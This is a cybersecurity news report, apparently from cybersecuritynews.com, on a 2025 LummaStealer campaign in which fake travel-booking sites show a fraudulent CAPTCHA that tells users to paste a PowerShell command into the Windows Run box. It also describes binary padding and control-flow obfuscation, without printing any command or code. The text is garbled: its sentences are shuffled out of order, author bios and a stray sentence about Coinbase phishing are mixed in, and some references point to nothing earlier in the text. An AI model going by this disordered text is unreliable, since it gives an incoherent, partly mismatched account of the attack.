Security researchers expect LummaStealer attacks to continue increasing in the coming months as attackers refine their social engineering techniques to exploit travelers seeking online booking services. The campaign, discovered in early 2025, tricks users into installing LummaStealer malware through deceptive CAPTCHA verification processes, putting personal and financial information at risk. The command runs a Base64-encoded script that downloads the LummaStealer payload from the attacker’s server and executes it on the victim’s system, all while bypassing traditional security measures since the user initiated the execution. G Data analysts identified that this attack initially targeted travelers booking trips to Palawan, Philippines, but later shifted to targeting hotel bookings in Munich, Germany, indicating a global campaign. This increase in size serves as an evasion technique known as Binary Padding, where malware authors add junk data to extend file size and potentially avoid detection by security tools. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The malware also employs an obfuscation technique called Indirect Control Flow, which uses Dispatcher Blocks to dynamically calculate target addresses at runtime rather than using direct jumps or calls, making analysis significantly more difficult. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Cybercriminals have launched a new sophisticated attack campaign targeting travelers through fake booking websites. The entire infection chain consists of four distinct stages that ultimately lead to the installation of LummaStealer, an information-stealing malware operating under a Malware-as-a-Service model. Before viewing their booking details, users encounter a CAPTCHA verification that requires them to click an “I’m not a robot” checkbox. Unlike legitimate CAPTCHA systems, this fraudulent verification instructs users to open their Windows Run command and paste a pre-copied command. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. A sophisticated phishing campaign is targeting cryptocurrency investors with fraudulent emails claiming a mandatory Coinbase wallet migration requirement. When users follow the deceptive instructions, they unknowingly execute a PowerShell command that initiates the infection chain.
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 19 Mar 2025 10:55:20 +0000